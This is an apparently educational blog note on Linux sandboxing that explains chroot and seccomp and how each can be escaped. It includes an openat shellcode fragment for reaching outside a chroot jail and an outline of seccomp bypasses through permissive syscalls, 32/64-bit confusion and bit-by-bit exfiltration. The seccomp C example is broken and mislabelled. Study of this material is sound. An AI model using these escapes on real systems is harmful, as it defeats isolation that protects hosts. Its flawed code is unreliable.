Sandboxing - Chroot & Seccomp

Created On 06. Jun 2021

Updated: 2021-06-06 02:07:24.950305000 +0000

Created By: acidghost

Sandboxing refers the isolation between the processes on a system. In the earlier days (back in the 80's) there was hardware specifically developed to separate different processes in the memory of computers. Later on this concept started to be used to isolate different environments in the programming realms, as for example the separation between the interpreter and the interpreted code.
One of the biggest targets for malicious hackers are the web browsers. Through a browser, the victims usually get routed to a malicious web page where nasty vulnerabilities infect the machine. A web browser has to keep up with the speed of the evolving web technology. In our days, browsers can do almost everything - stream videos, run games, play music etc. One of the classic malware transmitters was Adobe Flash and it wasn't the only technology that was killed off in hopes diminish the vulnerability issues. However, those technologies aren't the only ones that had vulnerabilities. JavaScript engines, different libraries and codecs, all of them can be exploited. Nowadays, sandboxing is also applied in browsers that restrict the privileges of the created child processes. Sandboxing has evolved a lot since the Adobe Flash times and exploiting such processes are not anymore one liner codes. With a sandbox in power, a set of vulnerabilities is required for exploitation, where first the sandbox process has to be exploited and second to break out of it.

Chroot

Chroot is a sandbox utility on Linux and it requires root privileges to be run. It used to be the sandbox utility back in the 79 when firstly appeared in Unix. However, it was never meant to be used as a security measure.

  • chroot() changes the meaning of '/' for a process and its children.

when for example trying to run a file in jail directory, calling chroot like this chroot /tmp/jail /tmp/jail/file will execute /tmp/jail/tmp/jail/file where actually such directory doesn't exist. Therefore for this process, "/" will run /tmp/jail/, so the correct command will be chroot /tmp/jail/ /file.

  • chroot("/tmp/jail") will disallow processes from getting out of the jail

when the user is out of the /tmp/jail directory, chroot won't be in effect. As soon the user will cd into the jail directory, chroot will enter in effect. This means that if the working directory would be somewhere outside of /tmp/jail, then .. will apply only within the jail.

  • doesn't have any syscall filtering

By triggering certain syscalls, it is possible to break out of the jail. Similar to the open (*int open(char pathname, int flags);) and execve syscall, there are also openat (*int openat(int dirfd pathname, int flags);) and execveat. The int dirfd argument can be used as a file descriptor that represents any opened directory even outside of the jail, or the special value at AT_FDCWD. As a shellcode this would start like this:

.global_start
.intel_syntax noprefix
        mov rax, 257 ;syscall number for openat
        mov rdi, 3 ; outside of jaild dirfd
        lea rsi, [path] ; the path
        mov rdx, 0 ; read-only
        syscall

Executing this however will not change the current working directory.

chroot("/tmp/jail") will not:
  • close resources that reside outside of the jail
  • cd (chdir()) into the jail
  • do anything else

chroot program that is running chroot and going into that directory

int main()
{
	chroot("/tmp/jail");
	chdir("/");
}

Escaping from chroot

the kernel does not have any memory of previous chroots for a process. This can be used to escape from there! The syscall number for chroot on 64bit systems is 161 and it takes one argument in rdi :wink:. Also, as mentioned above, it is possible to open directories outside of the jail with the int dirfd argument that can be used in the syscall 257.

Is chroot safe?

any user with the eUID of 0 can always break out of chroot, if the chroot syscall is not blocked. Other missing isolation:

  • PID - the chrooted processes will maintain globally the same PIDs
  • network - running for example netcat or accessing a website through a browser won't create any isolation
  • IPC - shared memory between processes

Some Practice

here are some scripts (piled up from here) that can be run consecutively with corresponding arguments to set up a chroot jail + a user that can then ssh straight into it. Escaping from it can be tried out on this example.

Chroot is still used a lot in many systems, however it's popularity has gone down. Other sandboxing utilities are cgroups, namespaces and seccomp.

Seccomp

Seccomp uses kernel-level sandboxing which can be used to filter certain system calls. Its rules are inherited by children. See more here https://man7.org/linux/man-pages/man3/seccomp_reset.3.html. While seccomp can get very complex, setting up a sandbox can be as simple as the following:

int main(int argc, char **argv)
{	// create a seccomp filter policy
	scmp_filter_ctx; 
	// allow any system call (init default policy)
	ctx = seccomp_init(SCMP_ACT_ALLOW);
	// with an action of kill add the execve syscall and read the file with cat as a child
	seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(read), 0);
	//apply the filter
	seccomp_load(ctx);

	execl("bin/cat", "cat, "/flag", (char *)0);
}

compile like this

gcc -o seccomp seccomp.c -lseccomp

If it doesn't work install the seccomp library with sudo apt install libseccomp-dev. Now strace it and see the contents of /flag.

Seccomp is an integration of the kernel functionality extended Berkeley Packet Filters (EBPF). eBPF are programs that run in an in-kernel "provably-safe" virtual machine. It can instruct the kernel to work in more ways for example to filter network traffic (iptables) or used to implement system-wide syscall tracing https://github.com/iovisor/bcc.

is used with seccomp() to apply sycall filters to processes.

Escaping Seccomp

Seccomp is a very modern solution to sandboxing (as of the time when this post was created) and escaping out of it is nowhere easy as from chroot. A lot of applications we use daily rely on it including docker, Firefox and Google Chrome. See more of sandbox exploits discovered in Chrome here https://github.com/allpaca/chrome-sbx-db. However, because all these applications must fulfill basic needs such as interacting with the user, this opens up many holes in seccomp security.
To break out of seccomp it is neccesarry that the sandboxed process can communicate with the privileged process. This would be the first vulnerability that has to exploited in the process of escaping it. To successfully communicate with the privileged process, the sandboxed process has to use system calls. Just this alone already opens up a lot of attack vectors including permissive policies, syscall confusion and kernel vulnerabilities in the syscall handler.

  • Permissive Policies

vulnerabilities in permissive policies appear in combination of allowed functionality which can mix with what is permitted and the available syscalls. However, the amount of syscalls is enormous, as mentioned in shellcoding and with every Linux version they keep being added.
An example: a ptrace() system call could let a sandboxed process 'puppet' a non-sandboxed process. ptrace() is the syscall for Linux's debugging functionality. With this it can monitor execution, change memory, instruction pointers, registers, inject shellcode etc.
Other effects:

  • sendmsg() can transfer file descriptors between processes
  • prctl() has bizzare possible effects
  • process_vm_witev() allows direct access to other process' memory

Taking only these few things in consideration, it is naturally that it might become impossible to track all the possible functionality of syscalls, and that's where some mistakes can lead to security issues.

  • Syscall Confusion

as mentioned in Assembly References, many 64-bit architectures are backwards compatible with the 32bit. However, interestingly enough, the syscalls for both architectures are completely different. One thing that might be sometimes omitted in seccomp policies are the filters for both 64-bit and 32-bit syscalls.

  • Kernel Vulnerabilities

is still possible to interact with the syscalls that are allowed even if we can't do anything!

  • 1 bit signals

this a very spectacular way of exfiltrating data where single bits are checked for error messages to identify the correct value. In future I will write few parts, describing how to apply this not only to escape out of sandboxes, but also decode different cryptographic hashes! Stay tuned! :wink:

References

https://pwn.college/modules/sandbox

Section: Binary Exploitation (PWN)

Back